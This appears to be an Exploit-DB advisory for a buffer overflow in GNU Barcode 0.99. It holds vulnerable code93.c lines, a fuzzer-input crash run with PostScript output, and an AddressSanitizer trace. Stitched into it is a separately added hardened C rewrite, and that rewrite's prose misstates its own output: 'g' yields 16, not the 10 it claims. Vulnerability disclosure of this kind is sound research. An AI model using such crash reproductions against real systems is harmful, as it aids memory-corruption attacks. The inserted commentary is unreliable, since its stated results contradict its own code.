GNU Barcode 0.99 – Buffer Overflow

  • Author: LiquidWorm
  • Date: 2018-05-29
  • Source: https://www.exploit-db.com/exploits/44797/

# GNU Barcode 0.99 - Buffer Overflow
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Author: Gjoko 'LiquidWorm' Krstic
# Tested on: Ubuntu 16.04.4
# Affected version: 0.99

# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates PostScript output.

# Desc: The vulnerability is caused by a boundary error in the processing
# of an input file, which can be exploited to cause a buffer overflow when a
# user processes, e.g., a specially crafted file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.


code93.c:

165: strcat(partial, codeset[code]);
166: checksum_str[checksum_len++] = code;
167:
168: /* Encode the second character */
169: code = strchr(alphabet, shiftset2[(int)(text[i])]) - alphabet;
170: strcat(partial, codeset[code]);
171: checksum_str[checksum_len++] = code;
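The excerpt above indexes the global table `shiftset2` with a raw input byte and then subtracts `alphabet` from whatever `strchr()` returns, and the AddressSanitizer trace further down pins a one-byte global read to exactly that line (code93.c:169). The C program below is an added example, not GNU Barcode's own code, showing the same lookup written defensively: the byte is widened as unsigned and bounds-checked against the table, an empty table entry is rejected before it reaches `strchr()`, and a NULL result is rejected before it is turned into an index. The alphabet string, the contents of the 128-entry `shiftset2` table, and the function names `code93_second_symbol` and `code93_first_bad_byte` are constructed for this example and are not taken from the project.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed Code 93 symbol alphabet (layout assumed for this example):
 * a symbol's value is its index in this string. */
static const char alphabet[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-. $/+%abcd*";

/* Constructed 128-entry table indexed by a 7-bit ASCII byte: the symbol that
 * follows the shift character in the extended encoding, or 0 when the byte
 * has no encoding. Only part of the real mapping is filled in. */
#define SHIFT_TABLE_LEN 128
static char shiftset2[SHIFT_TABLE_LEN];

static void init_shift_table(void)
{
    static int ready = 0;
    if (ready)
        return;
    for (int c = '0'; c <= '9'; c++) shiftset2[c] = (char)c;               /* plain symbols */
    for (int c = 'A'; c <= 'Z'; c++) shiftset2[c] = (char)c;
    for (int c = 'a'; c <= 'z'; c++) shiftset2[c] = (char)(c - 'a' + 'A'); /* shift + upper-case */
    shiftset2[' '] = ' ';
    shiftset2['-'] = '-';
    shiftset2['.'] = '.';
    ready = 1;
}

/* Hardened counterpart of the page's line 169:
 *     code = strchr(alphabet, shiftset2[(int)(text[i])]) - alphabet;
 * Returns the symbol value (0 .. strlen(alphabet)-1), or -1 if the byte cannot
 * be encoded. Three ways of producing a bad index are closed off:
 *   1. text[i] is read as unsigned, so bytes >= 0x80 never become a negative
 *      index, and anything at or past the table's end is rejected;
 *   2. a zero table entry (no encoding) is rejected instead of being handed to
 *      strchr(), which would "find" the alphabet's terminating NUL;
 *   3. a NULL from strchr() is rejected instead of being subtracted from
 *      alphabet, which would yield a garbage index into the pattern table. */
int code93_second_symbol(const char *text, size_t i)
{
    init_shift_table();
    unsigned char ch = (unsigned char)text[i];
    if (ch >= SHIFT_TABLE_LEN)
        return -1;
    char sym = shiftset2[ch];
    if (sym == '\0')
        return -1;
    const char *hit = strchr(alphabet, sym);
    if (hit == NULL)
        return -1;
    return (int)(hit - alphabet);
}

/* Validate an entire input before any encoding happens, so a bad byte is
 * reported up front rather than discovered half-way through the output.
 * Returns the offset of the first unencodable byte, or -1 if all are fine. */
long code93_first_bad_byte(const char *text, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (code93_second_symbol(text, i) < 0)
            return (long)i;
    return -1;
}

int main(void)
{
    /* Constructed sample: printable text followed by a 0x80 byte of the kind a
     * fuzzer produces; the original expression would use it as a raw index. */
    const char sample[] = "Wg9\x80";
    size_t len = sizeof(sample) - 1;
    long bad = code93_first_bad_byte(sample, len);
    for (size_t i = 0; i < len; i++)
        printf("byte 0x%02x -> symbol value %d\n",
               (unsigned char)sample[i], code93_second_symbol(sample, i));
    printf("first unencodable byte: %ld\n", bad);
    return bad < 0 ? 0 : 1;
}
```

Run stand-alone, the program reports offset 3 for the constructed sample (the 0x80 byte) and exits non-zero; the three printable bytes map to symbol values 32, 10 and 9. The point of splitting the lookup into checked steps is that each of the original line's sub-expressions is a separate place where an unchecked value becomes an index, so a fix that only validates the input byte still leaves the `strchr()` result unguarded.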
    
lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -i id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog

%%Page: 1 1

% Printing barcode for "W+G$A+M%KWWGWWWWWWWW9WW", scaled 1.00, encoded using "code 39"
% The space/bar succession is represented by the following widths (space first):
% 01311313111333111111113111313111111133131131313111131111311311311131311313111131111131313113111111331333111111133311111111111133131333111111133311111113331111111333111111133311111113331111111333111111133311111111133113111333111111133311111113111113311131131311
[
% height xpos ypos width    height xpos ypos width
  [75.00 10.50 15.00 0.85]  [75.00 14.50 15.00 0.85]
  [75.00 17.50 15.00 2.85]  [75.00 21.50 15.00 2.85]
  [75.00 24.50 15.00 0.85]  [70.00 27.50 20.00 2.85]
  [70.00 33.50 20.00 2.85]  [70.00 36.50 20.00 0.85]
  [70.00 38.50 20.00 0.85]  [70.00 40.50 20.00 0.85]
  [70.00 42.50 20.00 0.85]  [70.00 46.50 20.00 0.85]
  [70.00 48.50 20.00 0.85]  [70.00 52.50 20.00 0.85]
  [70.00 56.50 20.00 0.85]  [70.00 58.50 20.00 0.85]
  [70.00 60.50 20.00 0.85]  [70.00 62.50 20.00 0.85]
  [70.00 67.50 20.00 2.85]  [70.00 71.50 20.00 2.85]
  [70.00 74.50 20.00 0.85]  [70.00 78.50 20.00 0.85]
  [70.00 82.50 20.00 0.85]  [70.00 86.50 20.00 0.85]
  [70.00 88.50 20.00 0.85]  [70.00 91.50 20.00 2.85]
  [70.00 94.50 20.00 0.85]  [70.00 96.50 20.00 0.85]
  [70.00 100.50 20.00 0.85] [70.00 103.50 20.00 2.85]
  [70.00 106.50 20.00 0.85] [70.00 110.50 20.00 0.85]
  [70.00 112.50 20.00 0.85] [70.00 116.50 20.00 0.85]
  [70.00 120.50 20.00 0.85] [70.00 123.50 20.00 2.85]
  [70.00 127.50 20.00 2.85] [70.00 130.50 20.00 0.85]
  [70.00 132.50 20.00 0.85] [70.00 136.50 20.00 0.85]
  [70.00 138.50 20.00 0.85] [70.00 140.50 20.00 0.85]
  [70.00 144.50 20.00 0.85] [70.00 148.50 20.00 0.85]
  [70.00 152.50 20.00 0.85] [70.00 155.50 20.00 2.85]
  [70.00 158.50 20.00 0.85] [70.00 160.50 20.00 0.85]
  [70.00 162.50 20.00 0.85] [70.00 167.50 20.00 2.85]
  [70.00 171.50 20.00 2.85] [70.00 177.50 20.00 2.85]
  [70.00 180.50 20.00 0.85] [70.00 182.50 20.00 0.85]
  [70.00 184.50 20.00 0.85] [70.00 187.50 20.00 2.85]
  [70.00 193.50 20.00 2.85] [70.00 196.50 20.00 0.85]
  [70.00 198.50 20.00 0.85] [70.00 200.50 20.00 0.85]
  [70.00 202.50 20.00 0.85] [70.00 204.50 20.00 0.85]
  [70.00 206.50 20.00 0.85] [70.00 211.50 20.00 2.85]
  [70.00 215.50 20.00 2.85] [70.00 219.50 20.00 2.85]
  [70.00 225.50 20.00 2.85] [70.00 228.50 20.00 0.85]
  [70.00 230.50 20.00 0.85] [70.00 232.50 20.00 0.85]
  [70.00 235.50 20.00 2.85] [70.00 241.50 20.00 2.85]
  [70.00 244.50 20.00 0.85] [70.00 246.50 20.00 0.85]
  [70.00 248.50 20.00 0.85] [70.00 251.50 20.00 2.85]
  [70.00 257.50 20.00 2.85] [70.00 260.50 20.00 0.85]
  [70.00 262.50 20.00 0.85] [70.00 264.50 20.00 0.85]
  [70.00 267.50 20.00 2.85] [70.00 273.50 20.00 2.85]
  [70.00 276.50 20.00 0.85] [70.00 278.50 20.00 0.85]
  [70.00 280.50 20.00 0.85] [70.00 283.50 20.00 2.85]
  [70.00 289.50 20.00 2.85] [70.00 292.50 20.00 0.85]
  [70.00 294.50 20.00 0.85] [70.00 296.50 20.00 0.85]
  [70.00 299.50 20.00 2.85] [70.00 305.50 20.00 2.85]
  [70.00 308.50 20.00 0.85] [70.00 310.50 20.00 0.85]
  [70.00 312.50 20.00 0.85] [70.00 315.50 20.00 2.85]
  [70.00 321.50 20.00 2.85] [70.00 324.50 20.00 0.85]
  [70.00 326.50 20.00 0.85] [70.00 328.50 20.00 0.85]
  [70.00 331.50 20.00 2.85] [70.00 337.50 20.00 2.85]
  [70.00 340.50 20.00 0.85] [70.00 342.50 20.00 0.85]
  [70.00 344.50 20.00 0.85] [70.00 346.50 20.00 0.85]
  [70.00 349.50 20.00 2.85] [70.00 354.50 20.00 0.85]
  [70.00 357.50 20.00 2.85] [70.00 360.50 20.00 0.85]
  [70.00 363.50 20.00 2.85] [70.00 369.50 20.00 2.85]
  [70.00 372.50 20.00 0.85] [70.00 374.50 20.00 0.85]
  [70.00 376.50 20.00 0.85] [70.00 379.50 20.00 2.85]
  [70.00 385.50 20.00 2.85] [70.00 388.50 20.00 0.85]
  [70.00 390.50 20.00 0.85] [70.00 392.50 20.00 0.85]
  [70.00 395.50 20.00 2.85] [70.00 398.50 20.00 0.85]
  [70.00 400.50 20.00 0.85] [70.00 403.50 20.00 2.85]
  [70.00 408.50 20.00 0.85] [75.00 410.50 15.00 0.85]
  [75.00 414.50 15.00 0.85] [75.00 417.50 15.00 2.85]
  [75.00 421.50 15.00 2.85] [75.00 424.50 15.00 0.85]
    
] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
% char xpos ypos fontsize
  [(W) 32.00 10.00 12.00]
  [(+) 48.00 10.00 0.00]
  [(G) 64.00 10.00 0.00]
  [($) 80.00 10.00 0.00]
  [(A) 96.00 10.00 0.00]
  [(+) 112.00 10.00 0.00]
  [(M) 128.00 10.00 0.00]
  [(%) 144.00 10.00 0.00]
  [(K) 160.00 10.00 0.00]
  [(W) 176.00 10.00 0.00]
  [(W) 192.00 10.00 0.00]
  [(G) 208.00 10.00 0.00]
  [(W) 224.00 10.00 0.00]
  [(W) 240.00 10.00 0.00]
  [(W) 256.00 10.00 0.00]
  [(W) 272.00 10.00 0.00]
  [(W) 288.00 10.00 0.00]
  [(W) 304.00 10.00 0.00]
  [(W) 320.00 10.00 0.00]
  [(W) 336.00 10.00 0.00]
  [(9) 352.00 10.00 0.00]
  [(W) 368.00 10.00 0.00]
  [(W) 384.00 10.00 0.00]
] { {} forall dup 0.00 ne {
    /Helvetica findfont exch scalefont setfont
} {pop} ifelse
moveto show} bind forall
% End barcode for "W+G$A+M%KWWGWWWWWWWW9WW"

showpage
%%Page: 2 2

=================================================================
==11076==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000043bc02 at pc 0x00000042189a bp 0x7fff2f160c00 sp 0x7fff2f160bf0
READ of size 1 at 0x00000043bc02 thread T0
    #0 0x421899 in Barcode_93_encode /home/lqwrm/research/barcode-0.99/code93.c:169
    #1 0x409ac2 in Barcode_Encode_and_Print /home/lqwrm/research/barcode-0.99/library.c:234
    #2 0x402319 in main /home/lqwrm/research/barcode-0.99/main.c:564
    #3 0x7f9b8745282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #4 0x404708 in _start (/home/lqwrm/research/barcode-0.99/barcode+0x404708)

0x00000043bc02 is located 32 bytes to the right of global variable '*.LC6' defined in 'code93.c' (0x43bbe0) of size 2
  '*.LC6' is ascii string '1'
0x00000043bc02 is located 30 bytes to the left of global variable 'CSWTCH.16' defined in 'code93.c:146:5' (0x43bc20) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow /home/lqwrm/research/barcode-0.99/code93.c:169 Barcode_93_encode
Shadow bytes around the buggy address:
  0x00008007f730: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008007f740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008007f750: 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
  0x00008007f760: f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
  0x00008007f770: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 02 f9 f9 f9
=>0x00008007f780:[f9]f9 f9 f9 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9
  0x00008007f790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x00008007f7a0: 01 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x00008007f7b0: 00 00 00 00 00 00 00 00 01 f9 f9 f9 f9 f9 f9 f9
  0x00008007f7c0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
  0x00008007f7d0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==11076==ABORTING